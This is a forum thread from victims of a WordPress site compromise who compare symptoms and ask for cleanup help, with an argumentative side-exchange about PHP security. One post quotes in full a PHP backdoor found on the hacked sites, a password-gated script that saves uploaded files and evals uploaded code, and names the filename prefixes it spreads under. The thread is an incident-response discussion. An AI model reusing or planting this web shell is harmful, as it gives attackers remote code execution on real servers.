got hacked

Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

yes, actually I am, because that’s what communication is. If I were to intentionally nit-pick everything you’ve written looking for double-meanings and unintended loopholes to exploit, we’d be here all day error-checking our writing instead of getting on with business.

Come to think of it, it’s now painfully obvious why you’re being such an insufferable pain in the ass about all this. Unfortunately you’re also being hypocritical because your language suffers the same lack of accuracy mine does (only you seem proud of it).

case in point:

Yes, and…? If A is a kind of B, that doesn’t mean that A is the same as B.

Actually, it means that B *is* the same as A, for the broader definition that A brings with it. Get it right.

If you have a basket of apples, and one of them is red… they’re all still apples. Even the red one.

Please, nit-picking is for apes… I have no interest in it, so why not just go fix your busted wordpress as this discussion certainly isn’t going to do it.

elorgwhee, consider taking your media off the server (that is, only the media files in your uploads directory structure), then just rm -rf the whole lot.

… you likely have a local copy of your theme already, and you’ll have to reload plugins and such anyway…

just a thought.

Yeah, I’ve considered that. It’s really tempting. But I have a bit of custom code that was affected as well – so there’s no reinstalling it. I’d have to hope that my latest backup captured any of my recent updates to it.

Maybe I’ll just do that for wordpress and vanilla for now so at least those parts don’t continue to crash people’s computers. lol

Or maybe I can just cut over to the new site without any templates or plugins. It won’t be pretty, but it would work for now.. *rubs chin*

as one moon-face to another, I implore you to reconsider any prolonged chin-abrasion ??

edit: I apologise, I just realised that it’s only me who finds myself funny when I haven’t had any sleep…. and with that, I’m out ??

good luck with the recovery.

Ivovic,

I notice that you have now completely dropped the substantive argument about PHP’s security, and are trying to change the subject to some meta-rhetorical waffle. This doesn’t really surprise me, changing the subject is a common (if rather lame) way to avoid losing a debate.

Even though I think your meta-rhetorical waffle is at least as specious as your opinions on programming language security, I came here to discuss the former, not the latter.

Since you’ve dropped the subject I’m interested in, I think we are done.

I’ll get the light…

(click)

I got hacked, too. I just joined this site, and before I get flamed for being another guy who joined only when he got hacked, let me say its because I’ve been a happy camper with WordPress for almost 2 years. It’s done everything I asked and easily enough, so I just had no reason to search for more things to read. Sorry.

Every one of my php and htm files got hacked with the script zikzak shows.
How can I prevent it again?
How can I fix my broken blogs? (can I just point to the still-good sql from a new installation and throw away the code in the old?) How would I do this?
How do I punish the fuckers who did this? I want thumb screws and cat-o-nine-tails

Thanks ever so much,
Martin

My site was hacked as well. Any chance this thread can re-evolve from bickering to helping everyone figure out the cause?

I have the affected script attached to all my files…and although I didn’t find anything tagged with pre_ in front of the filename, I did find that hello.php in my plugins directory was copied to ext_hello.php with some funky code in it.

I have no idea how these guys got in, or how they destroyed my site. Any chance anyone has any ideas before I wipe it and start all over?

Thanks everyone.

I also got hacked and I had some custom code that wasn’t backed-up recently, so I have find the infected bits and clean it out.

I have started comparing the hacked website with backup copies using a folder compare application. Then I compare any suspect files using an app for finding text differences. So far I have only found the code already posted here and a directory with 71 casino html-pages.

In my case they used lib_ as a prefix on the files containing this:

<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','c1717aa0da396794f1a340b2ee7678c2');

function say($t) {
  echo "$t\n";
};

function testdata($t) {
  say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["s"]["size"])) {
      if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
      {
      testdata('save_ok');
      };
      //eval($code);
  } else {
    testdata('save_fail');
  };

  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["f"]["size"]))
  {
      eval($code);
      testdata('ok');
  } else {
    testdata('fail');
  };

} else {
  testdata('pass');
};

testdata('end');
echo "</pre>";
?>

Could someone please explain what this code is supposed to do?

The code responsible for traversing directories and creating files containing the code mentioned above seems to reside in a file named wp-stats.php in the top level of the WordPress install. (If I am not mistaken – I am not a php-programmer)

It randomly chooses a string to prepend to an existing filename. Prefixes used are ‘lib_’, ‘co_’, ‘pre_’, ‘net_’, ‘func_’, ‘ad_’, ‘ext_’, ‘new_’, ‘old_’, ‘fix_’, ‘fixed_’, ‘na_’, ‘av_’ and ‘fx_’.

There are some password related functions also.

Well we’re all learning.
We just put up a VPS server to control 1 issue of being hosted with other WP blogs that aren’t keeping current and not using security measures.

Now we’re cleaning a few sites and need some help.

We have a WordPress MYSQL database that appears to have
had a SQL injection. We’re attempting to clean the file and have
a few questions.

1) Are there any tools available that can scan a
backup of a MySQL table exported from phpMyAdmin
and clean out a SQL Injection?

2) Are there any tools available that can scan an online MySQL
database and clean out a SQL Injection?

3) Are there any tools that can detect any other problems
in regards to a WordPress installation that has been compromised?

We’re new to this cleanup process and any help at all in
locating any tools would be greatly appreciated.

Has anyone come up with a solution to this? I had this very thing happen to me recently. It seems there are allot of threads like this that go unanswered.

My files all began with fx_

How should I check my database to make sure none of this is polluting that as well?